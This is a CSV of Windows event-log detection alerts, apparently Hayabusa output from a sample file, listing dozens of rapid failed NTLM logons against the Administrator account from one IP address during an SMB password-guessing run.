2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
